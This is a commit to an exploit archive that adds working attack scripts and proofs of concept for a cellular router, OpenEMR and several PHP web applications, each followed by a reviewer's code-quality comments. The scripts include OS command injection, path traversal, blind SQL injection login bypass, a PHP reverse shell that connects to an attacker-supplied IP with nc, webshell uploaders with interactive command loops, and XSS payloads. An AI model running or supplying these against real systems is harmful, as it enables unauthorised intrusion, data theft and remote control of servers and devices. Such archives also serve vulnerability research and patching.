DB: 2021-07-06

11 changes to exploits/shellcodes

WordPress Plugin WP Learn Manager 1.1.2 - Stored Cross-Site Scripting (XSS)
OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)
Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)
Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)
Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)
Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass)
Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated)
Simple Client Management System 1.0 - Remote Code Execution (RCE)
TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated)
Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE)
Offensive Security 2021-07-06 05:02:03 +00:00
parent 5bd61e68a2
commit 540825f140
12 changed files with 778 additions and 0 deletions


@ -0,0 +1,77 @@
# Exploit Title: Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE)
# Date: 02.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.riconmobile.com
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Ricon Industrial Cellular Router S9922XL Remote Command Execution
#
#
# Vendor: Ricon Mobile Inc.
# Product web page: https://www.riconmobile.com
# Affected version: Model: S9922XL and S9922L
# Firmware: 16.10.3
#
# Summary: S9922L series LTE router is designed and manufactured by
# Ricon Mobile Inc., it based on 3G/LTE cellular network technology
# with industrial class quality. With its embedded cellular module,
# it widely used in multiple case like ATM connection, remote office
# security connection, data collection, etc.
#
# The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi
# and VPN technologies. Powerful 64-bit Processor and integrated real-time
# operating system specially developed by Ricon Mobile. S9922XL is
# widely used in many areas such as intelligent transportation, scada,
# POS, industrial automation, telemetry, finance, environmental protection.
#
# Desc: The router suffers from an authenticated OS command injection
# vulnerability. This can be exploited to inject and execute arbitrary
# shell commands as the admin (root) user via the 'ping_server_ip' POST
# parameter. Also vulnerable to Heartbleed.
#
# --------------------------------------------------------------------
# C:\>python ricon.py 192.168.1.71 id
# uid=0(admin) gid=0(admin)
# --------------------------------------------------------------------
#
# Tested on: GNU/Linux 2.6.36 (mips)
# WEB-ROUTER
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2021-5653
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php
#
#
# 02.07.2021
#
import requests,sys,re
if len(sys.argv)<3:
print("Ricon Industrial Routers RCE")
print("Usage: ./ricon.py [ip] [cmd]")
sys.exit(17)
else:
ipaddr=sys.argv[1]
execmd=sys.argv[2]
data={'submit_class' :'admin',
'submit_button' :'netTest',
'submit_type' :'',
'action' :'Apply',
'change_action' :'',
'is_ping' :'0',
'ping_server_ip':';'+execmd}
htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin'))
htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin'))
reout=re.search("20\">(.*)</textarea>",htreq.text,flags=re.S).group(1).strip('\n')
print(reout)
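
Review bot: both requests calls pass auth=('admin','admin'), yet the header calls the injection authenticated without saying that the script assumes this credential pair, and the usage text takes only [ip] [cmd]. State the assumption in the Desc block so a reader knows the script as written depends on an unchanged admin password. Two smaller points: re.search(...).group(1) raises AttributeError when the response has no matching textarea, so test the match for None and report the HTTP status instead; and the #!/usr/bin/env python3 line sits below the four header comments, where it has no effect. The "Also vulnerable to Heartbleed" remark is not supported by anything in the file and should either cite evidence or move to its own entry.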


@ -0,0 +1,27 @@
# Exploit Title: WordPress Plugin WP Learn Manager 1.1.2 - Stored Cross-Site Scripting (XSS)
# Date: July 2, 2021
# Exploit Author: Mohammed Adam
# Vendor Homepage: https://wplearnmanager.com/
# Software Link: https://wordpress.org/plugins/learn-manager/
# Version: 1.1.2
# References link: https://wpscan.com/vulnerability/e0182508-23f4-4bdb-a1ef-1d1be38f3ad1
*Description:*
The plugin does not properly sanitise or validate its User Field Titles, allowing XSS payload to be used in them. Furthermore, no CSRF and capability checks were in place, allowing such attack to be performed either via CSRF or as any user (including unauthenticated)
*Proof of Concept:*
POST /wp-admin/admin.php?page=jslm_fieldordering&task=saveuserfield HTTP/1.1
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
Connection: close
Upgrade-Insecure-Requests: 1
fieldtitle=Image%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&published=1&isvisitorpublished=1&required=0&search_user=1&search_visitor=1&form_request=jslearnmanager&id=28&isuserfield=0&fieldfor=3&save=Save
Then visit /wp-admin/admin.php?page=jslm_fieldordering&ff=3 as admin to trigger the XSS. It may also be triggered elsewhere
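
Review bot: the raw request under "Proof of Concept" is malformed as written: the Accept value has wrapped onto its own line, there is no Host header, and no blank line separates the headers from the fieldtitle=... body. Put the request in a delimited block with the header/body boundary intact so it can be read unambiguously. The header gives "Version: 1.1.2" but no fixed version; if the referenced WPScan entry names one, add it, since that is the first thing a site owner will look for. The closing "It may also be triggered elsewhere" should either list the other pages that render the field title or be dropped.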

73
exploits/php/webapps/50087.rb Executable file

@ -0,0 +1,73 @@
# Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)
# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)
# Exploit source: https://github.com/sec-it/exploit-CVE-2019-14530
# Date: 2021-06-24
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_7.tar.gz
# Docker PoC: https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml
# Version: < 5.0.2 (it means up to 5.0.1.7)
# Tested on: OpenEMR Version 5.0.1
# References: https://www.exploit-db.com/exploits/50037
# CVE: CVE-2019-14530
# CWE: CWE-22
# Patch: https://github.com/openemr/openemr/pull/2592/files
#!/usr/bin/env ruby
require 'pathname'
require 'httpx'
require 'docopt'
doc = <<~DOCOPT
OpenEMR < 5.0.2 - (Authenticated) Path Traversal - Local File Disclosure
Source: https://github.com/sec-it/exploit-CVE-2019-14530
Usage:
#{__FILE__} exploit <url> <filename> <username> <password> [--debug]
#{__FILE__} -h | --help
Options:
<url> Root URL (base path) including HTTP scheme, port and root folder
<filename> Filename of the file to be read
<username> Username of the admin
<password> Password of the admin
--debug Display arguments
-h, --help Show this screen
Examples:
#{__FILE__} exploit http://example.org/openemr /etc/passwd admin pass
#{__FILE__} exploit https://example.org:5000/ /etc/passwd admin pass
DOCOPT
def login(root_url, user, pass, http)
vuln_url = "#{root_url}/interface/main/main_screen.php?auth=login&site=default"
params = {
'new_login_session_management' => '1',
'authProvider' => 'Default',
'authUser' => user,
'clearPass' => pass,
'languageChoice' => '1'
}
http.post(vuln_url, form: params).body.to_s
end
def exploit(root_url, filename, http)
vuln_url = "#{root_url}/custom/ajax_download.php?fileName=../../../../../../../../../#{filename}"
http.get(vuln_url).body.to_s
end
begin
args = Docopt.docopt(doc)
pp args if args['--debug']
if args['exploit']
http = HTTPX.plugin(:cookies).plugin(:follow_redirects)
login(args['<url>'], args['<username>'], args['<password>'], http)
puts exploit(args['<url>'], args['<filename>'], http)
end
rescue Docopt::Exit => e
puts e.message
end
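
Review bot: in the begin block the return value of login(...) is discarded, so when authentication fails, puts exploit(...) prints whatever ajax_download.php returns as though it were the requested file. Inspect the login response and exit with a clear message before calling exploit. Minor points: require 'pathname' is never used, the #!/usr/bin/env ruby line follows the header comments and so has no effect, and "Version: < 5.0.2 (it means up to 5.0.1.7)" would read better as a plain range.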

122
exploits/php/webapps/50088.py Executable file

@ -0,0 +1,122 @@
# Exploit Title: Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)
# Exploit Author: Geiseric
# Original Exploit Author: deathflash1411 - https://www.exploit-db.com/exploits/50076 - https://www.exploit-db.com/exploits/50075
# Date 02.07.2021
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html
# Version 1.0
# Tested on: Ubuntu 20.04
import requests
import os
import sys
from requests_toolbelt.multipart.encoder import MultipartEncoder
import string
import random
if len(sys.argv) < 4:
print('[+] Usage: python3 ovsploit.py http://<ip> <your ip> <your port>')
exit()
url = sys.argv[1]
attacker_ip = sys.argv[2]
attacker_port = sys.argv[3]
exp_url = '/Online_voting_system/admin/save_candidate.php'
login_url = '/Online_voting_system/admin/'
def first_get():
r = requests.get(url+login_url)
return r.headers['Set-Cookie']
def retrieve_first_admin():
print("[!] Stage 1: Finding a valid admin user through SQL Injection")
cookie = first_get()
count = 0
i=1
flag = True
admin = ''
while flag:
for j in range(32,128):
r = requests.post(url+login_url,data={'UserName': """aasd' AND (SELECT 7303 FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(UserName AS NCHAR),0x20) FROM users WHERE User_Type = "admin" LIMIT 0,1),"""+str(i)+""",1))="""+str(j)+""",0,1)))))PwbW)-- qRBs""",'Password': 'asd','Login':''},headers={"Cookie":cookie})
if (r.elapsed.total_seconds() > 1):
admin += chr(j)
i+=1
sys.stdout.write("\rAdmin User: "+ admin)
sys.stdout.flush()
count=0
else:
if count == 100:
flag = False
break
else:
count += 1
print("\n[+] First admin user found!")
print("[!] Starting Stage 2")
return admin
def id_generator(size=6, chars=string.ascii_lowercase):
return ''.join(random.choice(chars) for _ in range(size))+'.php'
def login_bypass(cookie):
username = retrieve_first_admin()
print("[!] Stage 2 started: Bypassing Login...")
r = requests.post(url+login_url,data={'UserName': username,'Password': "' or ''='",'Login':''}, headers={'Cookie':cookie})
return cookie
def rev_write():
name = id_generator()
f = open(name,'w')
f.write('<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc ' +attacker_ip+ " " + attacker_port+' >/tmp/f"); ?>')
f.close()
print('[+] Generated file with reverse shell: ' +name)
return name
def exploit(cookie):
print("[+] Uploading reverse shell...")
filename=rev_write()
multipart_data = MultipartEncoder(
{
# a file upload field
'image': (filename, open(filename, 'rb'), 'application/x-php'),
# plain text fields
'user_name': 'admin',
'rfirstname': 'test',
'rlastname': 'test',
'rgender': 'Male',
'ryear': '1st year',
'rmname': 'test',
'rposition': 'Governor',
'party': 'test',
'save': 'save'
}
)
r = requests.post(url+exp_url, data=multipart_data, headers={'Content-Type': multipart_data.content_type, 'Cookie':cookie})
return filename
filename = exploit(login_bypass(first_get()))
print("[!] Triggering...")
input('[+] Please start a listener on port ' + attacker_port +' then press Enter to get shell.')
os.system('curl '+url+'/Online_voting_system/admin/upload/'+filename+' -m 1 -s')
print("[+] Cleaning up!")
os.system("rm "+ filename)
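
Review bot: the last lines build shell commands by string concatenation, os.system('curl '+url+...) and os.system("rm "+ filename), with url taken straight from sys.argv[1], so shell metacharacters in the argument run on the operator's own machine. The script already imports requests; use requests.get with a timeout and os.remove(filename) instead. In login_bypass the response r is never inspected and the cookie is returned regardless, so the later stages run even when the login step did nothing, and the open(filename, 'rb') handle in exploit is never closed. The header lines "Date 02.07.2021" and "Version 1.0" are missing the colon used by the other fields.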


@ -0,0 +1,25 @@
# Exploit Title: Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 03 July 2021
# Exploit Author: Subhadip Nag
# Author Linkedin: www.linkedin.com/in/subhadip-nag-09/
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/
# Version: 1.1
# Tested on: Server: XAMPP
# Description #
Online Birth Certificate System 1.1 is vulnerable to stored cross site scripting (xss) in the registration form because of insufficient user supplied data.
# Proof of Concept (PoC) : Exploit #
1) Goto: http://localhost/OBCS/obcs/user/register.php
2) In the first name field, enter the payload: <script>alert(1)</script>
3) Click Register
4) Goto: http://localhost/OBCS/obcs/user/login.php
5) Enter your mobile number, password & click login
6) our XSS attack successfull
# PoC image
1) https://ibb.co/7C6g6nK
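
Review bot: the Software Link points at phpgurukul.com/client-management-system-using-php-mysql/, which does not match the Online Birth Certificate System named in the title or the /OBCS/ paths in the steps; please correct the link. The Description sentence stops at "because of insufficient user supplied data" and never names what is insufficient (validation, output encoding), and step 6 does not say which page renders the stored first name, which is what someone fixing or testing for this issue needs. The only evidence is an external image-host link; a short text description of the observed result would survive link rot.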


@ -0,0 +1,55 @@
# Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)
# Date: 07/03/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested on: Windows 10
# CVE : N/A
# Proof of Concept :
1- Login any user account and change profile picture.
2- Upload any php shell by altering it's extension to .jpg or .png. (i.e test.php.jpg)
3- Before uploading your file, intercept your traffic by using any proxy.
4- Change test.php.jpg file to test.php and click forward.
5- Find your test.php file path and try any command.
###################### REQUEST ##########################################
GET /cman/members/uploads/test.php?cmd=SYSTEMINFO HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/cman/members/dashboard.php
Cookie: PHPSESSID=cne8l4ct93krjqobdus7nv2sjc
####################### RESPONSE #########################################
HTTP/1.1 200 OK
Date: Sat, 03 Jul 2021 11:28:16 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3
X-Powered-By: PHP/8.0.3
Content-Length: 4410
Connection: close
Content-Type: text/html; charset=UTF-8
Host Name: MRT
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19043 N/A Build 19043
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Murat
System Boot Time: 6/25/2021, 2:51:40 PM
System Manufacturer: Dell Inc.
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
############################################################################
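
Review bot: the RESPONSE block pastes SYSTEMINFO output from the author's own workstation (Host Name, Registered Owner, System Boot Time) and the REQUEST block carries a PHPSESSID value; trim these to a one-line confirmation that the command ran. Steps 2 to 4 show the .php name being restored in a proxy after the .jpg name was accepted, which suggests the extension check is not enforced server-side, but the file has no Description field saying so; add one that names the missing check. "Date: 07/03/2021" is ambiguous between March and July, although the response timestamp shows 03 Jul 2021; use an unambiguous format. In step 2, "it's extension" should be "its extension".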


@ -0,0 +1,30 @@
# Exploit Title: Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 07/03/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested on: Windows 10
# Proof of Concept :
#Payload: <img src=x onerror=alert(1)>
#Injectable parameters : amount= and trcode=
###################### REQUEST ##########################################
POST /cman/members/Tithes.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: http://localhost
Connection: close
Referer: http://localhost/cman/members/Tithes.php
Cookie: PHPSESSID=cne2l4cs96krjqpbpus7nv2sjc
Upgrade-Insecure-Requests: 1
amount=<img+src%3dx+onerror%3dalert(1)>&trcode=<img+src%3dx+onerror%3dalert(1)>&save=
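
Review bot: the title claims 'Multiple' stored XSS, but the file documents a single request to /cman/members/Tithes.php with two parameters, amount and trcode, and never says which page later renders the stored values. Add a Description stating the affected pages and whether a member session is required (the request carries a PHPSESSID under /members/). The request also lacks the blank line between the headers and the amount=... body.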


@ -0,0 +1,38 @@
# Exploit Title: Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass)
# Date: 07/03/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested on: Windows 10
# Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication.
# Proof of Concept :
1-Go to http://target.com/cman/admin
2-Write the following payload to username and admin parameter and click login.
######################## REQUEST ###############################
POST /cman/admin/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: http://localhost
Connection: close
Referer: http://localhost/cman/admin/index.php
Cookie: PHPSESSID=cne5l4cs93krjqobput7nv7sjc
Upgrade-Insecure-Requests: 1
username=test&password=%27+or+%27a%27%3D%27a&login=
################################################################
PAYLOAD:
# username : test
# password : ' or 'a'='a
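
Review bot: step 2 says to write the payload into the "username and admin parameter", but the request and the PAYLOAD lines use username=test with the injection only in password, which is also what the title says; reword step 2 to name the password field. Step 1 uses http://target.com/cman/admin while the request shows Host: localhost; pick one placeholder. The Description states only the effect (login bypass); naming the cause, which the payload implies is the password value reaching the query unparameterised, would make the entry more useful to whoever has to fix it.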

165
exploits/php/webapps/50093.py Executable file

File diff suppressed because one or more lines are too long

61
exploits/php/webapps/50094.py Executable file

@ -0,0 +1,61 @@
# Exploit Title: Simple Client Management System 1.0 - Remote Code Execution (RCE)
# Date: July 4, 2021
# Exploit Author: Ishan Saha
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/client-details.zip
# Version: 1.0
# Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3 & Ubuntu & Kali
#!/usr/bin/python
# Description:
# 1. This uses the SQL injection to bypass the admin login and create a new user
# 2. The new user makes a client with the shell payload and uploads the generic shellcode into the server
# 3. the shell is called from the location
import requests
from colorama import Fore, Back, Style
'''
Description:
Using the sql injeciton to bypass the login and create a user.
This user creates a client with the shell as an image and uploads the shell.
The shell is called by the requests library for easier use.
------------------------------------------
Developed by - Ishan Saha & HackerCTF team (https://twitter.com/hackerctf)
------------------------------------------
'''
# Variables : change the URL according to need
URL="http://192.168.0.248/client/"
shellcode = "<?php system($_GET['cmd']);?>"
filename = "shell.php"
authdata={"username":"admin' or '1'='1","password":"admin' or '1'='1","login":"Submit Query"}
createuser = {"fname":"ishan","lname":"saha","email":"research@hackerctf.com","password":"Grow_with_hackerctf","contact":"1234567890","signup":"Sign Up"}
userlogin={"uemail":"research@hackerctf.com","password":"Grow_with_hackerctf","login":"LOG IN"}
shelldata={"fname":"a","lname":"l","uname":"l","email":"l@l.l","phone":"1234567890","plan":"k","pprice":"k","proofno":"l","caddress":"ll","haddress":"ll","rdate":"9/9/09","bdate":"9/9/09","depatment":"l","csubmit":"Submit"}
def format_text(title,item):
cr = '\r\n'
section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr
item=str(item)
text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET
return text
ShellSession = requests.Session()
response = ShellSession.get(URL)
response = ShellSession.post(URL + "admin/index.php",data=authdata)
response = ShellSession.post(URL + "admin/regester.php",data=createuser)
response = ShellSession.post(URL,data=userlogin)
response = ShellSession.post(URL + "create.php",data=shelldata,files={"uimg":(filename,shellcode,"application/php"),"proof1":(filename,shellcode,"application/php"),"proof2":(filename,shellcode,"application/php")})
location = URL +"img/" + filename
#print statements
print(format_text("Target",URL),end='')
print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='')
print(format_text("shell location",location),end='')
print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!"))
while True:
cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET)
if cmd == 'exit':
break
print(ShellSession.get(location + "?cmd="+cmd).content.decode())
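
Review bot: the script leaves state behind on the tested host and says nothing about it: the createuser dictionary registers research@hackerctf.com through admin/regester.php, and the create.php request stores shell.php under img/, with no cleanup once the loop exits. Document both artefacts in the header so a tester knows what to remove, or delete them on exit. The description appears twice (the numbered comment and the docstring, which has the typo "injeciton"), URL is hard-coded to 192.168.0.248 instead of being an argument, and cmd is appended to the query string without URL-encoding. The title says RCE with no authentication qualifier although the description relies on the login bypass.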

94
exploits/php/webapps/50095.py Executable file

@ -0,0 +1,94 @@
# Exploit Title: TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated)
# Date: 07/04/2021
# Exploit Author: Mevlüt Akçam
# Software Link: https://github.com/textpattern/textpattern
# Vendor Homepage: https://textpattern.com/
# Version: 4.9.0-dev
# Tested on: 20.04.1-Ubuntu
#!/usr/bin/python3
import requests
from bs4 import BeautifulSoup as bs4
import json
import string
import random
import argparse
# Colors
RED="\033[91m"
GREEN="\033[92m"
RESET="\033[0m"
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--url', required=True, action='store', help='Target url')
parser.add_argument('-u', '--user', required=True, action='store', help='Username')
parser.add_argument('-p', '--password', required=True, action='store', help='Password')
args = parser.parse_args()
URL=args.url
uname=args.user
passwd=args.password
session=requests.Session()
def login(uname,passwd):
data={'lang':'en','p_userid':uname,'p_password':passwd}
r_login=session.post(URL+"/textpattern/index.php",data=data, verify=False)
if r_login.status_code == 200:
print(GREEN,f"[+] Login successful , your cookie : {session.cookies['txp_login']}",RESET)
else:
print(RED,f"[-] Login failed",RESET)
exit()
def get_token():
print(GREEN,f"[+] Getting token ",RESET)
r_token=session.get(URL+"/textpattern/index.php?event=plugin")
soup = bs4(r_token.text, 'html.parser')
textpattern = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-1]
textpattern = json.loads(textpattern)
return textpattern['_txp_token']
def upload():
file_name=''.join(random.choice(string.ascii_lowercase) for _ in range(10))
file={
'theplugin':(
file_name+".php",
"""
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus>
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php if(isset($_GET['cmd'])){system($_GET['cmd']);} ?>
</pre>
</body>
</html>
<!-- """+file_name+" -->"
),# The file_name is used to verify that the file has been uploaded.
'install_new':(None,'Upload'),
'event':(None,'plugin'),
'step':(None,'plugin_upload'),
'_txp_token':(None,get_token()),
}
r_upload=session.post(URL+"/textpattern/index.php",verify=False,files=file)
if file_name in r_upload.text:
print(GREEN,f"[+] Shell uploaded",RESET)
print(GREEN,f"[+] Webshell url : {URL}/textpattern/tmp/{file_name}.php",RESET)
else:
print(RED,f"[-] Shell failed to load",RESET)
print(RED,f"[-] Bye",RESET)
exit()
if __name__=="__main__":
login(uname,passwd)
upload()
print(GREEN,f"[+] Bye",RESET)
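
Review bot: login() and upload() pass verify=False, so the username and password are sent to whatever certificate the host presents, while the session.get in get_token() omits the flag and behaves differently on the same host; make certificate handling one explicit command-line option applied to the session. login() treats any status 200 as success and then reads session.cookies['txp_login'], which raises KeyError if that cookie was not set; test for the cookie instead of the status code. soup.find_all("script")[2] depends on the order of script tags in the page, and the file written under textpattern/tmp/ is neither removed nor mentioned as something to clean up. Several f-strings have no placeholders.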


@ -44224,3 +44224,14 @@ id,file,description,date,author,type,platform,port
50082,exploits/php/webapps/50082.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)",2021-07-02,"Ron Jost",webapps,php,
50084,exploits/php/webapps/50084.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated)",2021-07-02,"Ron Jost",webapps,php,
50085,exploits/php/webapps/50085.txt,"Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)",2021-07-02,ircashem,webapps,php,
50086,exploits/php/webapps/50086.txt,"WordPress Plugin WP Learn Manager 1.1.2 - Stored Cross-Site Scripting (XSS)",2021-07-05,"Mohammed Adam",webapps,php,
50087,exploits/php/webapps/50087.rb,"OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)",2021-07-05,"Alexandre ZANNI",webapps,php,
50088,exploits/php/webapps/50088.py,"Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)",2021-07-05,Geiseric,webapps,php,
50089,exploits/php/webapps/50089.txt,"Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-07-05,"Subhadip Nag",webapps,php,
50090,exploits/php/webapps/50090.txt,"Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)",2021-07-05,"Murat DEMİRCİ",webapps,php,
50091,exploits/php/webapps/50091.txt,"Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-07-05,"Murat DEMİRCİ",webapps,php,
50092,exploits/php/webapps/50092.txt,"Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass)",2021-07-05,"Murat DEMİRCİ",webapps,php,
50093,exploits/php/webapps/50093.py,"Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated)",2021-07-05,"Ron Jost",webapps,php,
50094,exploits/php/webapps/50094.py,"Simple Client Management System 1.0 - Remote Code Execution (RCE)",2021-07-05,"Ishan Saha",webapps,php,
50095,exploits/php/webapps/50095.py,"TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated)",2021-07-05,"Mevlüt Akçam",webapps,php,
50096,exploits/hardware/webapps/50096.py,"Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE)",2021-07-05,LiquidWorm,webapps,hardware,
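
Review bot: the new rows are inconsistent with each other and with the files they index: 50093 is titled "Wordpress Plugin ..." (like the existing 50082 and 50084 rows) while 50086 uses "WordPress Plugin ...", 50087 lists the author as "Alexandre ZANNI" where the file header has "noraj (Alexandre ZANNI)", and 50090 to 50092 spell the author "Murat DEMİRCİ" against "Murat DEMIRCI" in the file headers. Every new row carries the date 2021-07-05 although the file headers give dates from 2021-06-24 to July 4, 2021; if this column is the publication date rather than the authoring date, say so where the columns are documented.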
